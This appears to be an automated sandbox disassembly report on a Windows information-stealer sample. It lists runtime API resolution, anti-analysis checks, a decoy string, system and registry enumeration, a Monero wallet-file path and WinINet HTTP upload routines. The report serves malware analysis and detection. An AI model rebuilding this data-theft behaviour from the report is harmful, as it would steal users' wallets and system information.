lstrcpy 15060->15062 15063 e20799 StrCmpCA 15061->15063 15064 e20a49 15062->15064 15065 e207a8 15063->15065 15092 e20843 15063->15092 15956 e20250 15064->15956 15068 e2a7a0 lstrcpy 15065->15068 15070 e207c3 15068->15070 15069 e20865 StrCmpCA 15071 e20874 15069->15071 15109 e2096b 15069->15109 15072 e11590 lstrcpy 15070->15072 15073 e2a740 lstrcpy 15071->15073 15074 e2080c 15072->15074 15077 e20881 15073->15077 15075 e2a7a0 lstrcpy 15074->15075 15078 e20823 15075->15078 15076 e2099c StrCmpCA 15079 e20a2d 15076->15079 15080 e209ab 15076->15080 15081 e2a9b0 4 API calls 15077->15081 15082 
e2a7a0 lstrcpy 15078->15082 15079->13489 15083 e11590 lstrcpy 15080->15083 15084 e208ac 15081->15084 15085 e2083e 15082->15085 15086 e209f4 15083->15086 15087 e2a920 3 API calls 15084->15087 15783 e1fb00 15085->15783 15089 e2a7a0 lstrcpy 15086->15089 15090 e208b3 15087->15090 15093 e20a0d 15089->15093 15091 e2a9b0 4 API calls 15090->15091 15094 e208ba 15091->15094 15092->15069 15095 e2a7a0 lstrcpy 15093->15095 15097 e2a8a0 lstrcpy 15094->15097 15096 e20a28 15095->15096 15899 e20030 15096->15899 15109->15076 15431 e2a7a0 lstrcpy 15430->15431 15432 e11683 15431->15432 15433 e2a7a0 lstrcpy 15432->15433 15434 e11695 15433->15434 15435 e2a7a0 lstrcpy 15434->15435 15436 e116a7 15435->15436 15437 e2a7a0 lstrcpy 15436->15437 15438 e115a3 15437->15438 15438->14312 15440 e147c6 15439->15440 15441 e14838 lstrlen 15440->15441 15465 e2aad0 15441->15465 15443 e14848 InternetCrackUrlA 15444 e14867 15443->15444 15444->14389 15446 e2a740 lstrcpy 15445->15446 15447 e28b74 15446->15447 15448 e2a740 lstrcpy 15447->15448 15449 e28b82 GetSystemTime 15448->15449 15451 e28b99 15449->15451 15450 e2a7a0 lstrcpy 15452 e28bfc 15450->15452 15451->15450 15452->14404 15454 e2a931 15453->15454 15455 e2a988 15454->15455 15458 e2a968 lstrcpy lstrcat 15454->15458 15456 e2a7a0 lstrcpy 15455->15456 15457 e2a994 15456->15457 15457->14407 15458->15455 15459->14522 15461 e19af9 LocalAlloc 15460->15461 15462 e14eee 15460->15462 15461->15462 15463 e19b14 CryptStringToBinaryA 15461->15463 15462->14410 15462->14412 15463->15462 15464 e19b39 LocalFree 15463->15464 15464->15462 15465->15443 15466->14532 15467->14673 15468->14675 15469->14683 15598 e277a0 15470->15598 15473 e276c6 RegOpenKeyExA 15475 e276e7 RegQueryValueExA 15473->15475 15476 e27704 RegCloseKey 15473->15476 15474 e21c1e 15474->14765 15475->15476 15476->15474 15478 e21c99 15477->15478 15478->14779 15480 e21e09 15479->15480 15480->14821 15482 e27a9a wsprintfA 15481->15482 15483 e21e84 15481->15483 15482->15483 15483->14835 15485 e21efe 
15484->15485 15486 e27b4d 15484->15486 15485->14849 15605 e28d20 LocalAlloc CharToOemW 15486->15605 15489 e2a740 lstrcpy 15488->15489 15490 e27bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15489->15490 15493 e27c25 15490->15493 15491 e27c46 GetLocaleInfoA 15491->15493 15492 e27d18 15494 e27d28 15492->15494 15495 e27d1e LocalFree 15492->15495 15493->15491 15493->15492 15497 e2a8a0 lstrcpy 15493->15497 15498 e2a9b0 lstrcpy lstrlen lstrcpy lstrcat 15493->15498 15496 e2a7a0 lstrcpy 15494->15496 15495->15494 15499 e27d37 15496->15499 15497->15493 15498->15493 15499->14862 15501 e22008 15500->15501 15501->14877 15503 e29493 GetModuleFileNameExA CloseHandle 15502->15503 15504 e294b5 15502->15504 15503->15504 15505 e2a740 lstrcpy 15504->15505 15506 e22091 15505->15506 15506->14892 15508 e22119 15507->15508 15509 e27e68 RegQueryValueExA 15507->15509 15508->14906 15510 e27e8e RegCloseKey 15509->15510 15510->15508 15512 e27fb9 GetLogicalProcessorInformationEx 15511->15512 15513 e27fd8 GetLastError 15512->15513 15514 e28029 15512->15514 15516 e28022 15513->15516 15523 e27fe3 15513->15523 15518 e289f0 2 API calls 15514->15518 15519 e289f0 2 API calls 15516->15519 15520 e22194 15516->15520 15521 e2807b 15518->15521 15519->15520 15520->14920 15521->15516 15522 e28084 wsprintfA 15521->15522 15522->15520 15523->15512 15523->15520 15606 e289f0 15523->15606 15609 e28a10 GetProcessHeap RtlAllocateHeap 15523->15609 15525 e2220f 15524->15525 15525->14934 15527 e289b0 15526->15527 15528 e2814d GlobalMemoryStatusEx 15527->15528 15531 e28163 __aulldiv 15528->15531 15529 e2819b wsprintfA 15530 e22289 15529->15530 15530->14948 15531->15529 15533 e287fb GetProcessHeap RtlAllocateHeap wsprintfA 15532->15533 15535 e2a740 lstrcpy 15533->15535 15536 e2230b 15535->15536 15536->14962 15538 e2a740 lstrcpy 15537->15538 15544 e28229 15538->15544 15539 e28263 15541 e2a7a0 lstrcpy 15539->15541 15540 e2a9b0 lstrcpy lstrlen lstrcpy lstrcat 15540->15544 15542 e282dc 15541->15542 15542->14979 
15543 e2a8a0 lstrcpy 15543->15544 15544->15539 15544->15540 15544->15543 15546 e2a740 lstrcpy 15545->15546 15547 e2835c RegOpenKeyExA 15546->15547 15548 e283d0 15547->15548 15549 e283ae 15547->15549 15551 e28613 RegCloseKey 15548->15551 15552 e283f8 RegEnumKeyExA 15548->15552 15550 e2a7a0 lstrcpy 15549->15550 15562 e283bd 15550->15562 15553 e2a7a0 lstrcpy 15551->15553 15554 e2860e 15552->15554 15555 e2843f wsprintfA RegOpenKeyExA 15552->15555 15553->15562 15554->15551 15556 e284c1 RegQueryValueExA 15555->15556 15557 e28485 RegCloseKey RegCloseKey 15555->15557 15558 e28601 RegCloseKey 15556->15558 15559 e284fa lstrlen 15556->15559 15560 e2a7a0 lstrcpy 15557->15560 15558->15554 15559->15558 15561 e28510 15559->15561 15560->15562 15563 e2a9b0 4 API calls 15561->15563 15562->15005 15564 e28527 15563->15564 15565 e2a8a0 lstrcpy 15564->15565 15566 e28533 15565->15566 15567 e2a9b0 4 API calls 15566->15567 15568 e28557 15567->15568 15569 e2a8a0 lstrcpy 15568->15569 15570 e28563 15569->15570 15571 e2856e RegQueryValueExA 15570->15571 15571->15558 15572 e285a3 15571->15572 15573 e2a9b0 4 API calls 15572->15573 15574 e285ba 15573->15574 15575 e2a8a0 lstrcpy 15574->15575 15576 e285c6 15575->15576 15577 e2a9b0 4 API calls 15576->15577 15578 e285ea 15577->15578 15579 e2a8a0 lstrcpy 15578->15579 15580 e285f6 15579->15580 15580->15558 15582 e2a740 lstrcpy 15581->15582 15583 e286bc CreateToolhelp32Snapshot Process32First 15582->15583 15584 e286e8 Process32Next 15583->15584 15585 e2875d CloseHandle 15583->15585 15584->15585 15589 e286fd 15584->15589 15586 e2a7a0 lstrcpy 15585->15586 15588 e28776 15586->15588 15587 e2a9b0 lstrcpy lstrlen lstrcpy lstrcat 15587->15589 15588->15037 15589->15584 15589->15587 15590 e2a8a0 lstrcpy 15589->15590 15590->15589 15592 e2a7a0 lstrcpy 15591->15592 15593 e251b5 15592->15593 15594 e11590 lstrcpy 15593->15594 15595 e251c6 15594->15595 15610 e15100 15595->15610 15597 e251cf 15597->15049 15601 e27720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 
15598->15601 15600 e276b9 15600->15473 15600->15474 15602 e27780 RegCloseKey 15601->15602 15603 e27765 RegQueryValueExA 15601->15603 15604 e27793 15602->15604 15603->15602 15604->15600 15605->15485 15607 e289f9 GetProcessHeap HeapFree 15606->15607 15608 e28a0c 15606->15608 15607->15608 15608->15523 15609->15523 15611 e2a7a0 lstrcpy 15610->15611 15612 e15119 15611->15612 15613 e147b0 2 API calls 15612->15613 15614 e15125 15613->15614 15770 e28ea0 15614->15770 15616 e15184 15617 e15192 lstrlen 15616->15617 15618 e151a5 15617->15618 15619 e28ea0 4 API calls 15618->15619 15620 e151b6 15619->15620 15621 e2a740 lstrcpy 15620->15621 15622 e151c9 15621->15622 15623 e2a740 lstrcpy 15622->15623 15624 e151d6 15623->15624 15625 e2a740 lstrcpy 15624->15625 15626 e151e3 15625->15626 15627 e2a740 lstrcpy 15626->15627 15628 e151f0 15627->15628 15629 e2a740 lstrcpy 15628->15629 15630 e151fd InternetOpenA StrCmpCA 15629->15630 15631 e1522f 15630->15631 15632 e158c4 InternetCloseHandle 15631->15632 15633 e28b60 3 API calls 15631->15633 15639 e158d9 codecvt 15632->15639 15634 e1524e 15633->15634 15635 e2a920 3 API calls 15634->15635 15636 e15261 15635->15636 15637 e2a8a0 lstrcpy 15636->15637 15638 e1526a 15637->15638 15640 e2a9b0 4 API calls 15638->15640 15643 e2a7a0 lstrcpy 15639->15643 15641 e152ab 15640->15641 15642 e2a920 3 API calls 15641->15642 15645 e152b2 15642->15645 15644 e15913 15643->15644 15644->15597 15646 e2a9b0 4 API calls 15645->15646 15647 e152b9 15646->15647 15648 e2a8a0 lstrcpy 15647->15648 15649 e152c2 15648->15649 15650 e2a9b0 4 API calls 15649->15650 15651 e15303 15650->15651 15652 e2a920 3 API calls 15651->15652 15653 e1530a 15652->15653 15654 e2a8a0 lstrcpy 15653->15654 15655 e15313 15654->15655 15656 e15329 InternetConnectA 15655->15656 15656->15632 15657 e15359 HttpOpenRequestA 15656->15657 15659 e158b7 InternetCloseHandle 15657->15659 15660 e153b7 15657->15660 15659->15632 15661 e2a9b0 4 API calls 15660->15661 15662 e153cb 15661->15662 15663 e2a8a0 lstrcpy 
15662->15663 15664 e153d4 15663->15664 15665 e2a920 3 API calls 15664->15665 15666 e153f2 15665->15666 15667 e2a8a0 lstrcpy 15666->15667 15668 e153fb 15667->15668 15669 e2a9b0 4 API calls 15668->15669 15670 e1541a 15669->15670 15671 e2a8a0 lstrcpy 15670->15671 15672 e15423 15671->15672 15673 e2a9b0 4 API calls 15672->15673 15674 e15444 15673->15674 15675 e2a8a0 lstrcpy 15674->15675 15676 e1544d 15675->15676 15677 e2a9b0 4 API calls 15676->15677 15678 e1546e 15677->15678 15771 e28ea9 15770->15771 15772 e28ead CryptBinaryToStringA 15770->15772 15771->15616 15772->15771 15773 e28ece GetProcessHeap RtlAllocateHeap 15772->15773 15773->15771 15774 e28ef4 codecvt 15773->15774 15775 e28f05 CryptBinaryToStringA 15774->15775 15775->15771 15779->15052 16022 e19880 15780->16022 15782 e198e1 15782->15059 15784 e2a740 lstrcpy 15783->15784 15957 e2a740 lstrcpy 15956->15957 15958 e20266 15957->15958 15959 e28de0 2 API calls 15958->15959 15960 e2027b 15959->15960 15961 e2a920 3 API calls 15960->15961 15962 e2028b 15961->15962 15963 e2a8a0 lstrcpy 15962->15963 15964 e20294 15963->15964 15965 e2a9b0 4 API calls 15964->15965 16023 e1988e 16022->16023 16026 e16fb0 16023->16026 16025 e198ad codecvt 16025->15782 16029 e16d40 16026->16029 16030 e16d63 16029->16030 16044 e16d59 16029->16044 16045 e16530 16030->16045 16034 e16dbe 16034->16044 16055 e169b0 16034->16055 16036 e16e2a 16037 e16ee6 VirtualFree 16036->16037 16039 e16ef7 16036->16039 16036->16044 16037->16039 16038 e16f41 16040 e289f0 2 API calls 16038->16040 16038->16044 16039->16038 16041 e16f26 FreeLibrary 16039->16041 16042 e16f38 16039->16042 16040->16044 16041->16039 16043 e289f0 2 API calls 16042->16043 16043->16038 16044->16025 16046 e16542 16045->16046 16048 e16549 16046->16048 16065 e28a10 GetProcessHeap RtlAllocateHeap 16046->16065 16048->16044 16049 e16660 16048->16049 16054 e1668f VirtualAlloc 16049->16054 16051 e16730 16052 e16743 VirtualAlloc 16051->16052 16053 e1673c 16051->16053 16052->16053 16053->16034 
16054->16051 16054->16053 16056 e169c9 16055->16056 16061 e169d5 16055->16061 16057 e16a09 LoadLibraryA 16056->16057 16056->16061 16058 e16a32 16057->16058 16057->16061 16059 e16ae0 16058->16059 16066 e28a10 GetProcessHeap RtlAllocateHeap 16058->16066 16059->16061 16063 e16ba8 GetProcAddress 16059->16063 16061->16036 16062 e16a8b 16062->16061 16064 e289f0 2 API calls 16062->16064 16063->16059 16063->16061 16064->16059 16065->16048 16066->16062

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 e29860-e29874 call e29750 663 e29a93-e29af2 LoadLibraryA * 5 660->663 664 e2987a-e29a8e call e29780 GetProcAddress * 21 660->664 666 e29af4-e29b08 GetProcAddress 663->666 667 e29b0d-e29b14 663->667 664->663 666->667 669 e29b46-e29b4d 667->669 670 e29b16-e29b41 GetProcAddress * 2 667->670 671 e29b68-e29b6f 669->671 672 e29b4f-e29b63 GetProcAddress 669->672 670->669 673 e29b71-e29b84 GetProcAddress 671->673 674 e29b89-e29b90 671->674 672->671 673->674 675 e29b92-e29bbc GetProcAddress * 2 674->675 676 e29bc1-e29bc2 674->676 675->676
                                APIs
                                • GetProcAddress.KERNEL32(75550000,008F0780), ref: 00E298A1
                                • GetProcAddress.KERNEL32(75550000,008F0798), ref: 00E298BA
                                • GetProcAddress.KERNEL32(75550000,008F0660), ref: 00E298D2
                                • GetProcAddress.KERNEL32(75550000,008F07B0), ref: 00E298EA
                                • GetProcAddress.KERNEL32(75550000,008F05A0), ref: 00E29903
                                • GetProcAddress.KERNEL32(75550000,008F89A0), ref: 00E2991B
                                • GetProcAddress.KERNEL32(75550000,008E6760), ref: 00E29933
                                • GetProcAddress.KERNEL32(75550000,008E67C0), ref: 00E2994C
                                • GetProcAddress.KERNEL32(75550000,008F0678), ref: 00E29964
                                • GetProcAddress.KERNEL32(75550000,008F07C8), ref: 00E2997C
                                • GetProcAddress.KERNEL32(75550000,008F05B8), ref: 00E29995
                                • GetProcAddress.KERNEL32(75550000,008F05D0), ref: 00E299AD
                                • GetProcAddress.KERNEL32(75550000,008E68A0), ref: 00E299C5
                                • GetProcAddress.KERNEL32(75550000,008F05E8), ref: 00E299DE
                                • GetProcAddress.KERNEL32(75550000,008F0600), ref: 00E299F6
                                • GetProcAddress.KERNEL32(75550000,008E6A00), ref: 00E29A0E
                                • GetProcAddress.KERNEL32(75550000,008F0690), ref: 00E29A27
                                • GetProcAddress.KERNEL32(75550000,008F08E8), ref: 00E29A3F
                                • GetProcAddress.KERNEL32(75550000,008E66C0), ref: 00E29A57
                                • GetProcAddress.KERNEL32(75550000,008F0888), ref: 00E29A70
                                • GetProcAddress.KERNEL32(75550000,008E68C0), ref: 00E29A88
                                • LoadLibraryA.KERNEL32(008F0870,?,00E26A00), ref: 00E29A9A
                                • LoadLibraryA.KERNEL32(008F08B8,?,00E26A00), ref: 00E29AAB
                                • LoadLibraryA.KERNEL32(008F0900,?,00E26A00), ref: 00E29ABD
                                • LoadLibraryA.KERNEL32(008F08A0,?,00E26A00), ref: 00E29ACF
                                • LoadLibraryA.KERNEL32(008F08D0,?,00E26A00), ref: 00E29AE0
                                • GetProcAddress.KERNEL32(75670000,008F0918), ref: 00E29B02
                                • GetProcAddress.KERNEL32(75750000,008F0858), ref: 00E29B23
                                • GetProcAddress.KERNEL32(75750000,008F8D18), ref: 00E29B3B
                                • GetProcAddress.KERNEL32(76BE0000,008F8CD0), ref: 00E29B5D
                                • GetProcAddress.KERNEL32(759D0000,008E6700), ref: 00E29B7E
                                • GetProcAddress.KERNEL32(773F0000,008F8940), ref: 00E29B9F
                                • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00E29BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00E29BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 96e6ca24d3d1d2d61d2dac37e1078f1c0733909c0ae53744a7192b94e80d881e
                                • Instruction ID: 1f3962cbe690c9c9a490ce9e755f6ded2f8ed1968a8f8ef1726db3d65149cc95
                                • Opcode Fuzzy Hash: 96e6ca24d3d1d2d61d2dac37e1078f1c0733909c0ae53744a7192b94e80d881e
                                • Instruction Fuzzy Hash: 08A10AB5710348DFD364EFA8E988A673BF9F78C301714975AA6868324CD63F9841CB60

                                 Control-flow Graph (basic blocks with the API called in each, and edges)

                                 • 764: e145c0-e14695, RtlAllocateHeap -> 781
                                 • 781: e146a0-e146a6 -> 782 or 783
                                 • 782: e146ac-e1474a -> 781 (loop back)
                                 • 783: e1474f-e147a9, VirtualProtect (exit)
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E1460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E1479C
                                Strings
                                 • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (the same string at all 30 references): 00E145C7, 00E145D2, 00E145DD, 00E145E8, 00E145F3, 00E14617, 00E14622, 00E1462D, 00E14638, 00E14643, 00E14657, 00E14662, 00E1466D, 00E14678, 00E14683, 00E146AC, 00E146B7, 00E146C2, 00E146CD, 00E146D8, 00E14713, 00E1471E, 00E14729, 00E14734, 00E1473F, 00E1474F, 00E1475A, 00E14765, 00E14770, 00E1477B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: the same 14 .sdmp dumps listed under the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                 • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one string repeated 30 times, $-separated, one per xref above)
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: ef49a91caa2f65edddbc0428c2e755b1616996089d4732fd9cebce567260ac69
                                • Instruction ID: 011500871902e4f1d3040e3ac34048005fc65d979ca711e141f81c100a8e802e
                                • Opcode Fuzzy Hash: ef49a91caa2f65edddbc0428c2e755b1616996089d4732fd9cebce567260ac69
                                • Instruction Fuzzy Hash: E94112616C37047FE628FBA6AC4EFDF7A625F43708F587040A84062780DFB27505C5AA

                                 Control-flow Graph (basic blocks with the API and helper calls made in each, and edges, ordered along the flow)

                                 • 801: e14880-e14942, call e2a7a0, call e147b0, call e2a740 * 5, InternetOpenA, StrCmpCA -> 816 or 817
                                 • 816: e14944 -> 817
                                 • 817: e1494b-e1494f -> 818 or 819
                                 • 818: e14955-e14acd, call e28b60, e2a920, e2a8a0, e2a800 * 2, e2a9b0, e2a8a0, e2a800, e2a9b0, e2a8a0, e2a800, e2a920, e2a8a0, e2a800, e2a9b0, e2a8a0, e2a800, e2a9b0, e2a8a0, e2a800, e2a9b0, e2a920, e2a8a0, e2a800 * 2, InternetConnectA -> 819 or 905
                                 • 905: e14ad3-e14ad7 -> 906 or 907
                                 • 906: e14ae5 -> 908
                                 • 907: e14ad9-e14ae3 -> 908
                                 • 908: e14aef-e14b22, HttpOpenRequestA -> 909 or 910
                                 • 909: e14b28-e14e28, 15 triplets of (e2a9b0 or e2a920, e2a8a0, e2a800), then call e2a740, e2a920 * 2, e2a8a0, e2a800 * 2, e2aad0, lstrlen, e2aad0 * 2, lstrlen, e2aad0, HttpSendRequestA -> 1021
                                 • 1021: e14e32-e14e5c, InternetReadFile -> 1022 or 1023
                                 • 1023: e14e5e-e14e65 -> 1022 or 1024
                                 • 1024: e14e69-e14ea7, call e2a9b0, e2a8a0, e2a800 -> 1021 (read loop)
                                 • 1022: e14e67-e14eb9, InternetCloseHandle, call e2a800 -> 910
                                 • 910: e14ebe-e14ec5, InternetCloseHandle -> 819
                                 • 819: e14ecb-e14ef3, InternetCloseHandle, call e2aad0, call e19ac0 -> 829 or 830
                                 • 830: e14ef5-e14f2d, call e2a820, e2a9b0, e2a8a0, e2a800 -> 829
                                 • 829: e14f32-e14fa2, call e28990 * 2, e2a7a0, e2a800 * 8 (exit)
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E14915
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E1493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E14ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E30DDB,00000000,?,?,00000000,?,",00000000,?,008FE500), ref: 00E14DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E14E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E14E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E14E49
                                • InternetCloseHandle.WININET(00000000), ref: 00E14EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00E14EC5
                                • HttpOpenRequestA.WININET(00000000,008FE550,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E14B15
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • InternetCloseHandle.WININET(00000000), ref: 00E14ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: the same 14 .sdmp dumps listed under the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: e74a2a2606cfafa56caf4cbce10ecd35cb8294ed5a84290cd8b36268768887e4
                                • Instruction ID: 96261fc78c1bbdd9b4cd2ace36c4f4baa50dc9c58de1ce366bc75fc19f7d70e3
                                • Opcode Fuzzy Hash: e74a2a2606cfafa56caf4cbce10ecd35cb8294ed5a84290cd8b36268768887e4
                                • Instruction Fuzzy Hash: 1E12CC729102289BDB19EB50EC56FEEB7B8BF54300F5451A9F10672091DF742F89CB61
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00E2792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: the same 14 .sdmp dumps listed under the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 619d5df449900247063f6861afc36b70d30f676199d747103c87944c850c6dec
                                • Instruction ID: 0c6208db697a2305f7100eafc7b1ebca078c551a2da88ef63c23db1dc51e0ff9
                                • Opcode Fuzzy Hash: 619d5df449900247063f6861afc36b70d30f676199d747103c87944c850c6dec
                                • Instruction Fuzzy Hash: 7A0186B1A08304EBC710DF94D945BABBBB8F744B21F104219F685F3280C77559408BA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E2789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: the same 14 .sdmp dumps listed under the first Memory Dump Source block above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 2138d4e98ede46f1aefeec11465f7d936054fb811cb9649e953a6ffe4955b66e
                                • Instruction ID: 59daf29a0bec0d042eeba59b76aaea5ef83a8f851477f25c0bd156cd8bc78fb9
                                • Opcode Fuzzy Hash: 2138d4e98ede46f1aefeec11465f7d936054fb811cb9649e953a6ffe4955b66e
                                • Instruction Fuzzy Hash: 0FF04FB1E44208EBC714DF98DD49BAFBBB8FB08721F10025AFA45A3680C77919048BA1
                                APIs
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 3ab710c7a19272a21e310c4f921c6961a0d3a6813be95a1e2f672c2809e30352
                                • Instruction ID: 4192294f47074cf4ce03edf6cd601cd5bae7dafeb124994993e3af8f3332dfc9
                                • Opcode Fuzzy Hash: 3ab710c7a19272a21e310c4f921c6961a0d3a6813be95a1e2f672c2809e30352
                                • Instruction Fuzzy Hash: 91D05E74A0030CDBCB10DFE0D8496DEBB78FB08311F001698D90673340EA3164C1CBA5

                                 Control-flow Graph (rendered graph omitted; function entry block e29c10-e29c1a, a chain of GetProcAddress and LoadLibraryA blocks resolving imports at runtime)
                                APIs
                                • GetProcAddress.KERNEL32(75550000,008E6720), ref: 00E29C2D
                                • GetProcAddress.KERNEL32(75550000,008E6800), ref: 00E29C45
                                • GetProcAddress.KERNEL32(75550000,008F8F28), ref: 00E29C5E
                                • GetProcAddress.KERNEL32(75550000,008F8F40), ref: 00E29C76
                                • GetProcAddress.KERNEL32(75550000,008FCA20), ref: 00E29C8E
                                • GetProcAddress.KERNEL32(75550000,008FC840), ref: 00E29CA7
                                • GetProcAddress.KERNEL32(75550000,008EB478), ref: 00E29CBF
                                • GetProcAddress.KERNEL32(75550000,008FC9C0), ref: 00E29CD7
                                • GetProcAddress.KERNEL32(75550000,008FC9D8), ref: 00E29CF0
                                • GetProcAddress.KERNEL32(75550000,008FC8D0), ref: 00E29D08
                                • GetProcAddress.KERNEL32(75550000,008FC9F0), ref: 00E29D20
                                • GetProcAddress.KERNEL32(75550000,008E6820), ref: 00E29D39
                                • GetProcAddress.KERNEL32(75550000,008E6960), ref: 00E29D51
                                • GetProcAddress.KERNEL32(75550000,008E6840), ref: 00E29D69
                                • GetProcAddress.KERNEL32(75550000,008E6880), ref: 00E29D82
                                • GetProcAddress.KERNEL32(75550000,008FCAE0), ref: 00E29D9A
                                • GetProcAddress.KERNEL32(75550000,008FCAC8), ref: 00E29DB2
                                • GetProcAddress.KERNEL32(75550000,008EB4C8), ref: 00E29DCB
                                • GetProcAddress.KERNEL32(75550000,008E6980), ref: 00E29DE3
                                • GetProcAddress.KERNEL32(75550000,008FCA08), ref: 00E29DFB
                                • GetProcAddress.KERNEL32(75550000,008FC858), ref: 00E29E14
                                • GetProcAddress.KERNEL32(75550000,008FC870), ref: 00E29E2C
                                • GetProcAddress.KERNEL32(75550000,008FCA38), ref: 00E29E44
                                • GetProcAddress.KERNEL32(75550000,008E69A0), ref: 00E29E5D
                                • GetProcAddress.KERNEL32(75550000,008FC828), ref: 00E29E75
                                • GetProcAddress.KERNEL32(75550000,008FCA50), ref: 00E29E8D
                                • GetProcAddress.KERNEL32(75550000,008FCA98), ref: 00E29EA6
